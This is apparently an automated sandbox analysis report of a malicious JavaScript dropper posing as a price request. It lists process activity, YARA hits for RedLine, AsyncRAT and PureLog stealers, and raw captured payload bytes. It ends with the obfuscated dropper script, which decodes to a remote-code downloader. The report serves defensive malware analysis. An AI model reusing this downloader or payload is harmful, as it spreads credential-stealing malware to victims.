                                                2024-04-24 05:00:34 UTC16384INData Raw: 38 50 6c 63 41 37 78 33 55 66 36 45 33 32 2f 2f 2f 48 41 42 59 41 41 41 42 58 56 31 64 58 56 2b 6a 41 48 51 41 41 67 38 51 55 4d 38 44 70 4f 67 45 41 41 49 74 46 43 49 50 34 2f 6e 55 4e 36 43 62 32 2f 2f 2f 48 41 41 6b 41 41 41 44 72 35 44 76 48 66 41 67 37 42 56 41 2f 51 67 42 79 44 65 67 4e 39 76 2f 2f 78 77 41 4a 41 41 41 41 36 37 36 4c 30 4d 48 36 42 59 50 67 48 38 48 67 42 6f 73 55 6c 57 41 2f 51 67 41 50 76 6b 51 43 42 44 50 32 52 69 50 47 64 4e 58 72 41 55 47 41 4f 53 42 30 2b 6f 6f 42 50 47 46 30 44 44 78 79 64 42 67 38 64 77 2b 46 65 2f 2f 2f 2f 32 6f 43 57 7a 50 53 69 58 30 4d 43 78 31 34 4f 55 49 41 36 32 69 4c 33 75 76 76 4f 2f 64 30 61 67 2b 2b 77 49 50 6f 49 48 52 59 67 2b 67 4c 64 45 4b 44 36 44 64 30 45 55 68 30 4b 34 50 6f 43 33 51 58 67
                                                Data Ascii: 8PlcA7x3Uf6E32///HABYAAABXV1dXV+jAHQAAg8QUM8DpOgEAAItFCIP4/nUN6Cb2///HAAkAAADr5DvHfAg7BVA/QgByDegN9v//xwAJAAAA676L0MH6BYPgH8HgBosUlWA/QgAPvkQCBDP2RiPGdNXrAUGAOSB0+ooBPGF0DDxydBg8dw+Fe////2oCWzPSiX0MCx14OUIA62iL3uvvO/d0ag++wIPoIHRYg+gLdEKD6Dd0EUh0K4PoC3QXg
                                                2024-04-24 05:00:35 UTC16384INData Raw: 6b 41 41 41 43 44 79 50 2f 70 6e 51 41 41 41 44 50 2f 4f 38 64 38 43 44 73 46 55 44 39 43 41 48 49 68 36 45 37 47 2f 2f 2b 4a 4f 4f 67 30 78 76 2f 2f 78 77 41 4a 41 41 41 41 56 31 64 58 56 31 66 6f 70 2b 33 2f 2f 34 50 45 46 4f 76 4a 69 38 6a 42 2b 51 57 4e 48 49 31 67 50 30 49 41 69 2f 43 44 35 68 2f 42 35 67 61 4c 43 77 2b 2b 54 44 45 45 67 2b 45 42 64 4c 39 51 36 4e 46 62 41 41 42 5a 69 58 33 38 69 77 50 32 52 44 41 45 41 58 51 57 2f 33 55 51 2f 33 55 4d 2f 33 55 49 36 43 37 34 2f 2f 2b 44 78 41 79 4a 52 65 54 72 46 75 6a 52 78 66 2f 2f 78 77 41 4a 41 41 41 41 36 4e 6e 46 2f 2f 2b 4a 4f 49 4e 4e 35 50 2f 48 52 66 7a 2b 2f 2f 2f 2f 36 41 6b 41 41 41 43 4c 52 65 54 6f 43 4f 6a 2f 2f 38 50 2f 64 51 6a 6f 47 31 77 41 41 46 6e 44 69 2f 39 56 69 2b 79 4c 52
                                                Data Ascii: kAAACDyP/pnQAAADP/O8d8CDsFUD9CAHIh6E7G//+JOOg0xv//xwAJAAAAV1dXV1fop+3//4PEFOvJi8jB+QWNHI1gP0IAi/CD5h/B5gaLCw++TDEEg+EBdL9Q6NFbAABZiX38iwP2RDAEAXQW/3UQ/3UM/3UI6C74//+DxAyJReTrFujRxf//xwAJAAAA6NnF//+JOINN5P/HRfz+////6AkAAACLReToCOj//8P/dQjoG1wAAFnDi/9Vi+yLR
                                                2024-04-24 05:00:35 UTC16384INData Raw: 79 44 2b 41 4a 30 42 44 76 44 64 59 4c 2f 46 51 53 78 51 51 43 4c 38 44 76 7a 44 34 52 79 2f 2f 2f 2f 4f 42 35 30 43 6b 41 34 47 48 58 37 51 44 67 59 64 66 59 72 78 6b 42 51 69 55 58 34 36 4e 72 79 2f 2f 2b 4c 2b 46 6b 37 2b 33 55 4d 56 76 38 56 41 4c 46 42 41 4f 6c 46 2f 2f 2f 2f 2f 33 58 34 56 6c 66 6f 6d 49 6e 2f 2f 34 50 45 44 46 62 2f 46 51 43 78 51 51 43 4c 78 31 39 65 57 38 6e 44 69 2f 39 57 75 47 41 50 51 67 43 2b 59 41 39 43 41 46 65 4c 2b 44 76 47 63 77 2b 4c 42 34 58 41 64 41 4c 2f 30 49 50 48 42 44 76 2b 63 76 46 66 58 73 4f 4c 2f 31 61 34 61 41 39 43 41 4c 35 6f 44 30 49 41 56 34 76 34 4f 38 5a 7a 44 34 73 48 68 63 42 30 41 76 2f 51 67 38 63 45 4f 2f 35 79 38 56 39 65 77 34 76 2f 56 59 76 73 67 2b 77 51 6f 54 51 69 51 67 43 44 5a 66 67 41 67
                                                Data Ascii: yD+AJ0BDvDdYL/FQSxQQCL8DvzD4Ry////OB50CkA4GHX7QDgYdfYrxkBQiUX46Nry//+L+Fk7+3UMVv8VALFBAOlF/////3X4VlfomIn//4PEDFb/FQCxQQCLx19eW8nDi/9WuGAPQgC+YA9CAFeL+DvGcw+LB4XAdAL/0IPHBDv+cvFfXsOL/1a4aA9CAL5oD0IAV4v4O8ZzD4sHhcB0Av/Qg8cEO/5y8V9ew4v/VYvsg+wQoTQiQgCDZfgAg
                                                2024-04-24 05:00:35 UTC16384INData Raw: 74 33 4c 4f 68 53 5a 76 2f 2f 61 69 4a 65 55 31 4e 54 55 31 4f 4a 4d 4f 6a 47 6a 66 2f 2f 67 38 51 55 4f 46 33 38 44 34 52 35 2f 2f 2f 2f 69 30 58 34 67 32 42 77 2f 65 6c 74 2f 2f 2f 2f 69 41 61 4c 52 51 67 37 77 33 51 47 78 77 41 42 41 41 41 41 4f 46 33 38 44 34 51 6c 2f 2f 2f 2f 69 30 58 34 67 32 42 77 2f 65 6b 5a 2f 2f 2f 2f 6a 55 30 4d 55 56 4e 58 56 6d 6f 42 6a 55 30 55 55 56 4f 4a 58 51 7a 2f 63 41 54 2f 46 62 79 77 51 51 41 37 77 33 51 55 4f 56 30 4d 44 34 56 65 2f 2f 2f 2f 69 30 30 49 4f 38 74 30 76 59 6b 42 36 37 6e 2f 46 51 53 77 51 51 43 44 2b 48 6f 50 68 55 54 2f 2f 2f 38 37 38 77 2b 45 5a 2f 2f 2f 2f 7a 76 37 44 34 5a 66 2f 2f 2f 2f 56 31 4e 57 36 42 31 67 2f 2f 2b 44 78 41 7a 70 54 2f 2f 2f 2f 34 76 2f 56 59 76 73 61 67 44 2f 64 52 54 2f 64
                                                Data Ascii: t3LOhSZv//aiJeU1NTU1OJMOjGjf//g8QUOF38D4R5////i0X4g2Bw/elt////iAaLRQg7w3QGxwABAAAAOF38D4Ql////i0X4g2Bw/ekZ////jU0MUVNXVmoBjU0UUVOJXQz/cAT/FbywQQA7w3QUOV0MD4Ve////i00IO8t0vYkB67n/FQSwQQCD+HoPhUT///878w+EZ////zv7D4Zf////V1NW6B1g//+DxAzpT////4v/VYvsagD/dRT/d
                                                2024-04-24 05:00:35 UTC477INData Raw: 73 7a 69 38 34 6a 7a 34 6c 4e 38 49 76 4b 30 2b 36 4c 54 66 77 4c 64 66 53 4a 4d 34 74 31 38 4e 50 6d 2f 30 55 49 67 33 30 49 41 34 6c 31 39 48 7a 54 69 2f 42 71 41 73 48 6d 41 6f 31 4e 36 46 6f 72 7a 6a 76 51 66 41 69 4c 4d 59 6c 30 6c 65 44 72 42 59 4e 6b 6c 65 41 41 53 6f 50 70 42 49 58 53 66 65 65 4c 4e 58 67 77 51 67 42 4f 6a 55 34 42 69 38 47 5a 67 2b 49 66 41 38 4c 42 2b 41 57 4c 30 59 48 69 48 77 41 41 67 49 6c 46 39 48 6b 46 53 6f 50 4b 34 45 4a 71 48 31 6b 72 79 6a 50 53 51 74 50 69 6a 56 79 46 34 49 6c 4e 38 49 55 54 44 34 53 43 41 41 41 41 67 38 72 2f 30 2b 4c 33 30 6f 56 55 68 65 44 72 42 59 4e 38 68 65 41 41 64 51 68 41 67 2f 67 44 66 50 50 72 5a 6f 76 47 6d 57 6f 66 57 53 50 52 41 38 4c 42 2b 41 57 42 35 68 38 41 41 49 42 35 42 55 36 44 7a
                                                Data Ascii: szi84jz4lN8IvK0+6LTfwLdfSJM4t18NPm/0UIg30IA4l19HzTi/BqAsHmAo1N6ForzjvQfAiLMYl0leDrBYNkleAASoPpBIXSfeeLNXgwQgBOjU4Bi8GZg+IfA8LB+AWL0YHiHwAAgIlF9HkFSoPK4EJqH1kryjPSQtPijVyF4IlN8IUTD4SCAAAAg8r/0+L30oVUheDrBYN8heAAdQhAg/gDfPPrZovGmWofWSPRA8LB+AWB5h8AAIB5BU6Dz

Target ID: 0
Start time: 07:00:29
Start date: 24/04/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Price request N#U00b0DEM23000199.js"
Imagebase: 0x7ff6faa70000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 07:00:34
Start date: 24/04/2024
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IDWYPJ.js"
Imagebase: 0x7ff6faa70000
File size: 170'496 bytes
MD5 hash: A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000003.1400639939.0000027D83495000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.1404488524.0000027D83ED0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 4
Start time: 07:00:34
Start date: 24/04/2024
Path: C:\Users\user\AppData\Local\Temp\NaE.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\NaE.exe"
Imagebase: 0x400000
File size: 212'480 bytes
MD5 hash: E05EDADFDDE523064F35BA05A09B55D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1459366756.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1461979166.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000003.1401870654.0000000000782000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1461555095.0000000003465000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1460269498.00000000022D0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000004.00000002.1461555095.0000000003508000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000004.00000002.1460450489.0000000002461000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000004.00000002.1459773527.00000000020E1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: Joe Security
• Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\NaE.exe, Author: ditekSHen
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 75%, ReversingLabs
• Detection: 62%, Virustotal
Reputation: low
Has exited: true

Target ID: 5
Start time: 07:00:40
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\tmpAB92.tmp.bat""
Imagebase: 0xa40000
File size: 236'544 bytes
MD5 hash: D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 6
Start time: 07:00:40
Start date: 24/04/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff6ee680000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 7
Start time: 07:00:40
Start date: 24/04/2024
Path: C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit): true
Commandline: timeout 3
Imagebase: 0xc10000
File size: 25'088 bytes
MD5 hash: 976566BEEFCCA4A159ECBDB2D4B1A3E3
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 8
Start time: 07:00:43
Start date: 24/04/2024
Path: C:\Users\user\AppData\Local\Temp\audio.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\audio.exe"
Imagebase: 0x400000
File size: 212'480 bytes
MD5 hash: E05EDADFDDE523064F35BA05A09B55D5
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646725943.0000000002620000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2647263309.00000000036F5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2645719105.00000000006F1000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646294834.0000000002121000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse, Description: Detects file containing reversed ASEP Autorun registry keys, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000008.00000002.2646894853.00000000026F1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
• Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000003.1485055464.00000000006DF000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000008.00000002.2646838997.00000000026A0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: Joe Security
                                                • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: C:\Users\user\AppData\Local\Temp\audio.exe, Author: ditekSHen
                                                Antivirus matches:
                                                • Detection: 100%, Avira
                                                • Detection: 100%, Joe Sandbox ML
                                                • Detection: 75%, ReversingLabs
                                                • Detection: 62%, Virustotal, Browse
                                                Reputation:low
                                                Has exited:false

                                                Target ID:10
                                                Start time:07:00:49
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\audio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\audio.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000003.1556222690.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1605649844.0000000002310000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1606710078.00000000050B0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1605576072.00000000021A1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000A.00000002.1606447047.00000000034E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000A.00000002.1606012151.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Target ID:12
                                                Start time:07:00:58
                                                Start date:24/04/2024
                                                Path:C:\Users\user\AppData\Local\Temp\audio.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\Temp\audio.exe"
                                                Imagebase:0x400000
                                                File size:212'480 bytes
                                                MD5 hash:E05EDADFDDE523064F35BA05A09B55D5
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1704070418.0000000004A60000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1704215181.00000000050C0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000003.1633955977.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1703974284.00000000035E5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.1703024609.00000000020C1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_AsyncRAT, Description: Yara detected AsyncRAT, Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 0000000C.00000002.1703663074.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:low
                                                Has exited:true

                                                Call Graph

                                                Call graph (rendered image omitted; legend distinguishes executed from not-executed nodes). Recovered edges: entry -> String.fromCharCode, entry -> eval.

                                                Script:

                                                Code
                                                var U1s = 258393352;
                                                  var GFDESM = String.fromCharCode ( 258393468 - U1s, 258393466 - U1s, 258393473 - U1s, 258393475 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393429 - U1s, 258393435 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393402 - U1s, 258393398 - U1s, 258393440 - U1s, 258393429 - U1s, 258393428 - U1s, 258393424 - U1s, 258393436 - U1s, 258393436 - U1s, 258393432 - U1s, 258393386 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393431 - U1s, 258393464 - U1s, 258393453 - U1s, 258393462 - U1s, 258393392 - U1s, 258393386 - U1s, 258393423 - U1s, 258393421 - U1s, 258393436 - U1s, 258393386 - U1s, 258393396 - U1s, 258393384 - U1s, 258393386 - U1s, 258393456 - U1s, 258393468 - U1s, 258393468 - U1s, 258393464 - U1s, 258393467 - U1s, 258393410 - U1s, 258393399 - U1s, 258393399 - U1s, 258393464 - U1s, 258393463 - U1s, 258393467 - U1s, 258393468 - U1s, 258393469 - U1s, 258393468 - U1s, 258393463 - U1s, 258393464 - U1s, 258393457 - U1s, 258393449 - U1s, 258393398 - U1s, 258393462 - U1s, 258393453 - U1s, 258393468 - U1s, 258393399 - U1s, 258393471 - U1s, 258393464 - U1s, 258393397 - U1s, 258393457 - U1s, 258393462 - U1s, 258393451 - U1s, 258393460 - U1s, 258393469 - U1s, 258393452 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393457 - U1s, 258393461 - U1s, 258393449 
- U1s, 258393455 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393467 - U1s, 258393461 - U1s, 258393457 - U1s, 258393460 - U1s, 258393457 - U1s, 258393453 - U1s, 258393467 - U1s, 258393399 - U1s, 258393471 - U1s, 258393464 - U1s, 258393398 - U1s, 258393458 - U1s, 258393467 - U1s, 258393386 - U1s, 258393396 - U1s, 258393384 - U1s, 258393454 - U1s, 258393449 - U1s, 258393460 - U1s, 258393467 - U1s, 258393453 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393398 - U1s, 258393435 - U1s, 258393453 - U1s, 258393462 - U1s, 258393452 - U1s, 258393392 - U1s, 258393393 - U1s, 258393411 - U1s, 258393362 - U1s, 258393470 - U1s, 258393449 - U1s, 258393466 - U1s, 258393384 - U1s, 258393454 - U1s, 258393467 - U1s, 258393463 - U1s, 258393384 - U1s, 258393413 - U1s, 258393384 - U1s, 258393462 - U1s, 258393453 - U1s, 258393471 - U1s, 258393384 - U1s, 258393417 - U1s, 258393451 - U1s, 258393468 - U1s, 258393457 - U1s, 258393470 - U1s, 258393453 - U1s, 258393440 - U1s, 258393431 - U1s, 258393450 - U1s, 258393458 - U1s, 258393453 - U1s, 258393451 - U1s, 258393468 - U1s, 258393392 - U1s, 258393386 - U1s, 258393435 - U1s, 258393451 - U1s, 258393466 - U1s, 258393457 - U1s, 258393464 - U1s, 258393468 - U1s, 258393457 - U1s, 258393462 - U1s, 258393455 - U1s, 258393398 - U1s, 258393422 - U1s, 258393457 - U1s, 258393460 - U1s, 258393453 - U1s, 258393435 - U1s, 258393473 - U1s, 258393467 - 